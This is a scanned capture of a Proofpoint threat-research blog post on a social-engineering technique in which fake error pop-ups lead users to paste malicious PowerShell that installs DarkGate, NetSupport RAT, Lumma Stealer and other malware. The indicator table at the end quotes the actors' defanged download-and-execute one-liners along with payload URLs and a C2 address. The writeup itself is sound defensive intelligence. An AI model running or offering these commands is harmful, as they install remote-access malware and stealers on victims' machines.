www.proofpoint.com
Open in
urlscan Pro
2a02:e980:107::cf
Public Scan
URL:
https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn
Submission: On June 19 via api from IN — Scanned from DE
Submission: On June 19 via api from IN — Scanned from DE
Form analysis 4 forms found in the DOM
<form class="header-nav__search-form">
<input type="text" class="header-nav__search-input" placeholder="">
<input type="submit" class="header-nav__search-button" val="Search">
</form><form id="mktoForm_19277" data-mkto-id="19277" data-mkto-base="//app-abj.marketo.com" data-munchkin-id="309-RHV-619" data-submit-text="" data-redirect-link="" data-prefill="" data-event-label="" data-lang-code="us" data-validate-email="1"
class="mk-form__form marketo-form-block__form mktoForm mktoHasWidth mktoLayoutLeft js-visible mkto-form-processed" data-asset-type="Blogs Subscribe" novalidate="novalidate"
style="font-family: inherit; font-size: 16px; color: rgb(51, 51, 51); width: 1601px;">
<style type="text/css"></style>
<div class="mktoFormRow">
<div class="mktoFieldDescriptor mktoFormCol" style="margin-bottom: 5px;">
<div class="mktoOffset" style="width: 5px;"></div>
<div class="mktoFieldWrap mktoRequiredField"><label for="Email" id="LblEmail" class="mktoLabel mktoHasWidth" style="width: 150px;">
<div class="mktoAsterix">*</div>Business Email:
</label>
<div class="mktoGutter mktoHasWidth" style="width: 5px;"></div><input id="Email" name="Email" placeholder="Business Email *" maxlength="255" aria-labelledby="LblEmail InstructEmail" type="email"
class="mktoField mktoEmailField mktoHasWidth mktoRequired" aria-required="true" style="width: 200px;"><span id="InstructEmail" tabindex="-1" class="mktoInstruction"></span>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="blogInterest" class="mktoField mktoFieldDescriptor mktoFormCol" value="All Blog Posts" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Employees_Picklist__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="State" class="mktoField mktoFieldDescriptor mktoFormCol" value="State/Province" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Most_Recent_Medium__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="Website" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Most_Recent_Medium_Detail__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="www-pfpt" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Industry" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Website" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="AnnualRevenue" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="demandbasesid" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="demandBase_Data_Source" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Primary_Product_Interest__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="UTM_Post_ID__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="utmcampaign" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="utmterm" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="db_employee_count" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Unsubscribed" class="mktoField mktoFieldDescriptor mktoFormCol" value="0" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoButtonRow"><span class="mktoButtonWrap mktoNative" style="margin-left: 110px;"><button type="submit" class="mktoButton">Submit</button></span></div><input type="hidden" name="formid" class="mktoField mktoFieldDescriptor"
value="19277" placeholder=""><input type="hidden" name="munchkinId" class="mktoField mktoFieldDescriptor" value="309-RHV-619" placeholder=""><input type="hidden" name="Website_Conversion_URL__c" class="mktoField mktoFieldDescriptor"
value="https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn" placeholder=""><input type="hidden" name="gAClientID" class="mktoField mktoFieldDescriptor" value="105418422.1718785403" placeholder="">
<style type="text/css"></style>
<div class="mktoFormRow">
<div class="mktoFieldDescriptor mktoFormCol" style="margin-bottom: 5px;">
<div class="mktoOffset" style="width: 5px;"></div>
<div class="mktoFieldWrap mktoRequiredField"><label for="Email" id="LblEmail" class="mktoLabel mktoHasWidth" style="width: 150px;">
<div class="mktoAsterix">*</div>Business Email:
</label>
<div class="mktoGutter mktoHasWidth" style="width: 5px;"></div><input id="Email" name="Email" placeholder="Business Email *" maxlength="255" aria-labelledby="LblEmail InstructEmail" type="email"
class="mktoField mktoEmailField mktoHasWidth mktoRequired" aria-required="true" style="width: 200px;"><span id="InstructEmail" tabindex="-1" class="mktoInstruction"></span>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="blogInterest" class="mktoField mktoFieldDescriptor mktoFormCol" value="All Blog Posts" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Employees_Picklist__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="State" class="mktoField mktoFieldDescriptor mktoFormCol" value="State/Province" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Most_Recent_Medium__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="Website" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Most_Recent_Medium_Detail__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="www-pfpt" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Industry" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Website" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="AnnualRevenue" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="demandbasesid" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="demandBase_Data_Source" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Primary_Product_Interest__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="UTM_Post_ID__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="utmcampaign" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="utmterm" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="db_employee_count" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Unsubscribed" class="mktoField mktoFieldDescriptor mktoFormCol" value="0" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoButtonRow"><span class="mktoButtonWrap mktoNative" style="margin-left: 110px;"><button type="submit" class="mktoButton">Submit</button></span></div>
</form><form data-mkto-id="19277" data-mkto-base="//app-abj.marketo.com" data-munchkin-id="309-RHV-619" data-submit-text="" data-redirect-link="" data-prefill="" data-event-label="" data-lang-code="us" data-validate-email="1"
class="mk-form__form marketo-form-block__form mktoForm mktoHasWidth mktoLayoutLeft" data-asset-type="Blogs Subscribe" novalidate="novalidate"
style="font-family: inherit; font-size: 16px; color: rgb(51, 51, 51); visibility: hidden; position: absolute; top: -500px; left: -1000px; width: 1600px;"></form><form data-mkto-id="19277" data-mkto-base="//app-abj.marketo.com" data-munchkin-id="309-RHV-619" data-submit-text="" data-redirect-link="" data-prefill="" data-event-label="" data-lang-code="us" data-validate-email="1"
class="mk-form__form marketo-form-block__form mktoForm mktoHasWidth mktoLayoutLeft js-visible mkto-form-processed" data-asset-type="Blogs Subscribe" novalidate="novalidate"
style="font-family: inherit; font-size: 16px; color: rgb(51, 51, 51); width: 1600px; visibility: hidden; position: absolute; top: -500px; left: -1000px;"></form>Text Content
Skip to main content English (Americas) Search Login * Products * Solutions * Resources Proofpoint Contact Search * Products * Solutions * Partners * Resources * Company Search Login English (Americas) Products Solutions Partners Resources Company Protect People Multi-layered, adaptive defenses for threat detection, impersonation, and supplier risk. Email Security Impersonation Protection More products Defend Data Transform your information protection with a human-centric, omni-channel approach. Enterprise DLP Adaptive Email DLP Insider Threat Management Intelligent Compliance Mitigate Human Risk Unlock full user risk visibility and drive behavior change. Security Awareness Augment Your Capabilities Managed Services Product Packages More Protect People Products Account Take-Over and Identity Protection Secure vulnerable identities, stop lateral movement and privilege escalation. Adaptive Email Security Stop more threats with a fully integrated layer of behavioral AI. Secure Email Relay Secure your application email and accelerate DMARC implementation SOLUTIONS See how we solve today's complex cyber threats and attacks. Solutions by Industry People-centric solutions for your organization. Authenticate Your Email Protect your email deliverability with DMARC. Combat Email and Cloud Threats Protect your people from email and cloud threats with an intelligent and holistic approach. Change User Behavior Help your employees identify, resist and report attacks before the damage is done. Combat Data Loss and Insider Risk Prevent data loss via negligent, compromised and malicious insiders. Modernize Compliance and Archiving Manage risk and data retention needs with a modern compliance and archiving solution. Protect Cloud Apps Keep your people and their cloud apps secure by eliminating threats and data loss. Prevent Loss from Ransomware Learn about this growing threat and stop attacks by securing ransomware's top vector: email. Secure Microsoft 365 Implement the best security and compliance solution for Microsoft 365. SOLUTIONS BY INDUSTRY People-centric solutions for your organization. Federal Government Cybersecurity for federal government agencies. State and Local Government Protecting the public sector, and the public from cyber threats. Higher Education A higher level of security for higher education. Financial Services Eliminate threats, build trust and foster growth for your organization. Healthcare Protect clinicians, patient data, and your intellectual property against advanced threats. Mobile Operators Make your messaging environment a secure environment. Internet Service Providers Cloudmark email protection. Small and Medium Businesses Big-time security for small business. PARTNERS Deliver Proofpoint solutions to your customers. Channel Partners Archive Extraction Partners Learn about Extraction Partners. GSI and MSP Partners Learn about our global consulting. Technology and Alliance Partners Learn about our relationships. Social Media Protection Partners Learn about the technology and.... Proofpoint Essentials Partner Programs Small Business Solutions . Become a Channel Partner RESOURCES Find reports, webinars, blogs, events, podcasts and more. Resource Library Blog Keep up with the latest news and happenings. Webinars Browse our webinar library to learn about the latest threats, trends and issues in cybersecurity. Podcasts Learn about the human side of cybersecurity. New Perimeters Magazine Get the latest cybersecurity insights in your hands. Threat Glossary Learn about the latest security threats. Events Connect with us at events to learn how to protect your people and data from ever-evolving threats. Customer Stories Read how our customers solve their most pressing cybersecurity challenges. COMPANY Proofpoint protects organizations' greatest assets and biggest risks: their people. About Proofpoint Why Proofpoint Learn about our unique people-centric approach to protection. Careers Stand out and make a difference at one of the world's leading cybersecurity companies. News Center Read the latest press releases, news stories and media highlights about Proofpoint. Privacy and Trust Learn about how we handle data and make commitments to privacy and other regulations. Environmental, Social, and Governance Learn how we apply our principles to positively impact our community. Support Access the full range of Proofpoint support services. Search Proofpoint Try searching for Email Security Phishing DLP Email Fraud Select Product Login * Support Log-in * Digital Risk Portal * Email Fraud Defense * ET Intelligence * Proofpoint Essentials * Sendmail Support Log-in Select Language * English (Americas) * English (Europe, Middle East, Africa) * English (Asia-Pacific) * Español * Deutsch * Français * Italiano * Português * 日本語 * 한국어 Blog Threat Insight From Clipboard to Compromise: A PowerShell Self-Pwn FROM CLIPBOARD TO COMPROMISE: A POWERSHELL SELF-PWN Share with your network! June 17, 2024 Tommy Madjar, Dusty Miller, Selena Larson and the Proofpoint Threat Research Team KEY FINDINGS * Proofpoint researchers identified an increasingly popular technique leveraging unique social engineering to run PowerShell and install malware. * Researchers observed TA571 and the ClearFake activity cluster use this technique. * Although the attack chain requires significant user interaction to be successful, the social engineering is clever enough to present someone with what looks like a real problem and solution simultaneously, which may prompt a user to take action without considering the risk. OVERVIEW Proofpoint has observed an increase in a technique leveraging unique social engineering that directs users to copy and paste malicious PowerShell scripts to infect their computers with malware. Threat actors including initial access broker TA571 and at least one fake update activity set are using this method to deliver malware including DarkGate, Matanbuchus, NetSupport, and various information stealers. Whether the initial campaign begins via malspam or delivered via web browser injects, the technique is similar. Users are shown a popup textbox that suggests an error occurred when trying to open the document or webpage, and instructions are provided to copy and paste a malicious script into the PowerShell terminal, or the Windows Run dialog box to eventually run the script via PowerShell. Proofpoint has observed this technique as early as 1 March 2024 by TA571, and in early April by the ClearFake cluster, as well as in early June by both clusters. CAMPAIGN DETAILS CLEARFAKE EXAMPLE Our researchers first observed this technique with the ClearFake campaign in early April and we have observed it used in every ClearFake campaign since then. ClearFake is a fake browser update activity cluster that compromises legitimate websites with malicious HTML and JavaScript. In observed campaigns, when a user visited a compromised website, the injection caused the website to load a malicious script hosted on the blockchain via Binance’s Smart Chain contracts, a technique known as "EtherHiding". The initial script then loaded a second script from a domain that used Keitaro TDS for filtering. If this second script loaded and passed various checks, and if the victim continued to browse the website, they were presented with a fake warning overlay on the compromised website. This warning instructed them to install a "root certificate" to view the website correctly. Malicious fake warning instructing recipients to copy a PowerShell script and run it in the PowerShell Terminal. The message included instructions to click a button to copy a PowerShell script and then provided steps on how to manually run this script on the victim's computer. If the instructions were followed, the user executed the PowerShell by pasting it into the PowerShell command line interface window. In campaigns in May, we observed the following chain: The script performed various functions including flushing the DNS cache, removing clipboard content, displaying a decoy message to the user, and downloading a remote PowerShell script and execute it in-memory. The second PowerShell script was essentially used to download yet another PowerShell script. This third PowerShell script obtained system temperatures via WMI and, if no temperature was returned as in the case of many virtual environments and sandboxes, exited the script. However, if it continued, it led to a fourth AES-encrypted PowerShell script that downloaded a file named “data.zip” and extracted the contents to find and execute any .exe files, and then reported back to the ClearFake C2 that the installation was completed. The threat actor used ZIP’s ability to contain any executable and bundled various legitimate, signed executables that side-loaded a trojanized DLL. This DLL used DOILoader (also known as IDAT Loader or HijackLoader) to load Lumma Stealer from an encrypted file, also included in the downloaded ZIP file. Lumma Stealer then, in addition to performing the stealer activities, downloaded three distinctive payloads: * am.exe – Amadey Loader * ma.exe – A downloader that downloaded and ran the XMRig crypto currency miner with a specific configuration * cl.exe – A clipboard hijacker designed to replace cryptocurrency addresses in the clipboard, constructed to cause the victim to transfer cryptocurrency to a threat actor-controlled address instead of the intended address when doing transfers Amadey was observed to download other payloads, for example a Go-based malware believed to be JaskaGO. This means that in total, five distinct malware families could be executed just by running the one initial PowerShell script. Example ClearFake attack chain. THE CURIOUS CASE OF CLICKFIX In mid-April 2024, researchers found compromised sites containing an inject leading to an iframe on pley[.]es. This iframe was shown as an overlay error message claiming that a faulty browser update needed to be fixed. Researchers dubbed this activity cluster ClickFix. ClickFix error message per 11 May 2024. The error message asked the victim to open “Windows PowerShell (Admin)” (which will open an UAC prompt) and then right-click to paste the code. If this was done, PowerShell would run another remote PowerShell script that would download and run an executable, eventually leading to Vidar Stealer. However, just a few days later, after discovery, the payload domain used in the PowerShell was taken offline. Thus, despite the error being displayed on compromised websites, it could not lead to an infection. After a few days of this semi-functional state, 15 May 2024, the custom content of the iframe was replaced with the ClearFake inject. It is still serving this inject in early June 2024. As the pley[.]es domain itself seems to be compromised, it’s unclear if these two activity sets – ClearFake and ClickFix – started to work with each other, or if the ClearFake actor re-compromised the iframe, replacing the code with its own content. Extract from custom iframe content on 11 May 2024. iframe content as on 07 June 2024. TA571 EXAMPLES Proofpoint first observed TA571’s use of this technique in a campaign on 01 March 2024. The campaign included over 100,000 messages and targeted thousands of organizations globally. TA571 email lure. In this campaign, emails contained an HTML attachment that displayed a page resembling Microsoft Word. The page also displayed an error message that said the “‘Word Online’ extension is not installed,” and presented two options to continue: “How to fix” and “Auto-fix”. HTML attachment containing instructions on how to copy and paste PowerShell that leads to the installation of malware. Clicking the “How to fix” button copied a base64-encoded PowerShell command to the computer’s clipboard, and the message on the page changed to instruct the target to open a PowerShell terminal and right-click the console window. Right clicking a terminal window pasted the content of the clipboard and executed the PowerShell. Proofpoint observed two different PowerShell commands in these files: one that downloaded and executed an MSI file, and one that downloaded and executed a VBS script. If the “Auto-fix” button was clicked, the search-ms protocol displayed a similar WebDAV-hosted “fix.msi” or “fix.vbs” in Windows Explorer. When executed, the MSI ran a bundled DLL, “Inkpad3.dll”, with the LOLBAS command “msiexec -z”. This command ran the DllUnregisterServer function of the DLL, which dropped and executed another DLL, “Inkpad_honeymoon.msp”. This led to the installation of Matanbuchus. If the VBS was executed, it used PowerShell to download and execute DarkGate. Proofpoint observed TA571 use similar attack chains in campaigns throughout the spring, using various visual lures and varying between instructing the victim to either open the PowerShell terminal or using the Run dialog box by pressing the Windows button+R. The actor also removed wording that refers to copy/paste, abusing the fact that the victim doesn’t need to know that something is copied to the clipboard. Some recent examples: On 27 May 2024, TA571 used an HTML attachment that appeared to display a document hosted on OneDrive and contained a fake error message. HTML attachment purporting to be a document hosted on OneDrive containing a “How to fix” button. If the “How to fix” button was clicked, it copied a PowerShell script to the clipboard and provided instructions to the user on how to run it. This attack chain ultimately led to the installation of DarkGate malware. TA571 continues to modify and update its lures and attack chains while using the PowerShell clipboard technique. On 28 May 2024, Proofpoint identified a TA571 campaign using HTML attachments that used a different error message. Notably, this campaign included instructions for the victim to click the "Fix" button to "install the root certificate”, which is language that ClearFake error messages used. In this campaign, TA571 asked the victim to use the Run dialogue box to run the malicious script instead of the PowerShell terminal. The TA571 campaign contained at least two different command lines running different PowerShell scripts, one leading to DarkGate via a downloaded HTA-file that ran another PowerShell script and one leading to NetSupport RAT via a downloaded ZIP file. In most of the campaigns, TA571 also padded the HTML files with various random content, creating semi-unique hashes for the attachments. Example of the new TA571 lure containing similar language to ClearFake. COMMON TECHNIQUES In all cases, both via the fake updates or the HTML attachments, the malicious PowerShell/CMD script is copied to the clipboard via browser-side JavaScript, commonly used on legitimate sites too. The malicious content is contained in the HTML/website in various places, and encoded in several ways, such as double-Base64, reverse Base64 or even clear text in various elements and functions. The legitimate use, and the many ways to store the malicious code, and the fact that the victim manually runs the malicious code without any direct association with a file, makes detection for these types of threats difficult. As antivirus software and EDRs will have issues inspecting clipboard content, detection and blocking needs to be in place prior to the malicious HTML/site being presented to the victim. As for the difference between asking the victim to run the malicious code either via the PowerShell terminal, or via the Run dialogue box, they have various issues. For example, using the PowerShell terminal, the user must perform more steps to open it. However, once there, it is enough to right click once, and the code will automatically be pasted and executed, without letting the victim review the code first. When it comes to the Run dialogue box, the whole process can be done with four clicks/button combinations: click the button, Ctrl+R to open the dialogue, Ctrl+V to paste the code, and enter to run the code. However, with this method the victim might have second thoughts when seeing the code being pasted and might press cancel instead of running it. ATTRIBUTION TA571 is a spam distributor, and this actor sends high volume email campaigns to deliver and install a variety malware for their cybercriminal customers, depending on the subsequent operator’s objectives. Proofpoint assesses with high confidence that TA571 infections can lead to ransomware. ClearFake is not currently attributed to a tracked threat actor. While it’s clear that both actors are borrowing ideas from each other, Proofpoint does not associate them with each other in any other way. CONCLUSION This attack chain requires significant user interaction to be successful. The social engineering in the fake error messages is clever and purports to be an authoritative notification coming from the operating system. It also provides both the problem and a solution so that a viewer may take prompt action without pausing to consider the risk. The attack chain is unique and aligns with the overall trend Proofpoint has observed of cybercriminal threat actors adopting new, varied, and increasingly creative attack chains – including improving social engineering, nested PowerShell, and the use of WebDAV and SMB – to enable malware delivery. Organizations should train users to identify the activity and report suspicious activity to their security teams. This is very specific training but can easily be integrated into an existing user training program. EMERGING THREATS SIGNATURES The Emerging Threats ruleset contains detections for the malware identified in these campaigns. EXAMPLE INDICATORS OF COMPROMISE The following is not an exhaustive list of IOCs, but a sample observed in recent campaigns. Indicator Description Date Observed rechtsanwalt@ra-silberkuhl[.]com TA571 campaign reply-to email 28 May 2024 9701fec71e5bbec912f69c8ed63ffb6dba21b9cca7e67da5d60a72139c1795d1 TA571 HTML Attachment Example Hash 28 May 2024 hxxps://cdn3535[.]shop/1[.]zip TA571 clipboard payload (NetSupport RAT) 28 May 2024 hxxps://lashakhazhalia86dancer[.]com/c[.]txt TA571 clipboard payload (DarkGate) 28 May 2024 hxxp://languangjob[.]com/pandstvx TA571 HTA payload (DarkGate) 28 May 2024 hxxp://languangjob[.]com/pandstvx TA571 PowerShell payload (DarkGate) 28 May 2024 cmd /c start /min powershell invoke-webrequest -uri hxxps://lashakhazhalia86dancer[.]com/c.txt -outfile c:\users\public\default.hta; start-process c:\users\public\default.hta; TA571 Clipboard to DarkGate 28 May 2024 cmd /c start /min powershell $st='c:\\users\\public';$om=$st+'\\start.zip';$ps=$st+'\\client\\client32.exe';invoke-webrequest -uri hxxps://cdn3535[.]shop/1.zip -outfile $om;expand-archive $om $st; start-process $ps;Set-Clipboard -Value ' ';exit; TA571 Clipboard to NetSupport 28 May 2024 07e0c15adc6fcf6096dd5b0b03c20145171c00afe14100468f18f01876457c80 TA571 HTML Attachment Example Hash 27 May 2024 hxxps://kostumn1[.]ilabserver[.]com/1.zip TA571 PowerShell Payload URL 27 May 2024 91.222.173[.]113 DarkGate C2 27 May 2024 hxxp://mylittlecabbage[.]net/qhsddxna TA571 Payload URL 17 May 2024 hxxp://mylittlecabbage[.]net/xcdttafq TA571 Payload URL 17 May 2024 hxxps://jenniferwelsh[.]com/header.png TA571 Payload URL 17 May 2024 cmd /c start /min powershell $Id = 'c:\users\public\or.hta';invoke-webrequest -uri hxxps://jenniferwelsh[.]com/header.png -outfile $Id;start-process $Id;Set-Clipboard -Value ' ';exit;== TA571 Clipboard to DarkGate 17 May 2024 mylittlecabbage[.]net DarkGate C2 17 May 2024 hxxps://rtattack[.]baqebei1[.]online/df/tt ClearFake PowerShell Payload 14 May 2024 hxxps://oazevents[.]com/loader[.]html ClickFix PowerShell Payload URL 11 May 2024 11909c0262563f29d28312baffb7ff027f113512c5a76bab7c5870f348ff778f TA571 HTML Attachment Example Hash 1 March 2024 Previous Blog Post SUBSCRIBE TO THE PROOFPOINT BLOG * Business Email: Submit * Business Email: Submit Products * Protect People * Defend Data * Mitigate Human Risk * Premium Services Get Support * Product Support Login * Support Services * IP Address Blocked? Connect with Us * +1-408-517-4710 * Attend an Event * Contact Us * Free Demo Request More * About Proofpoint * Why Proofpoint * Careers * Leadership Team * News Center * Privacy and Trust © 2024. All rights reserved. Terms and conditions Privacy Policy Sitemap * * * *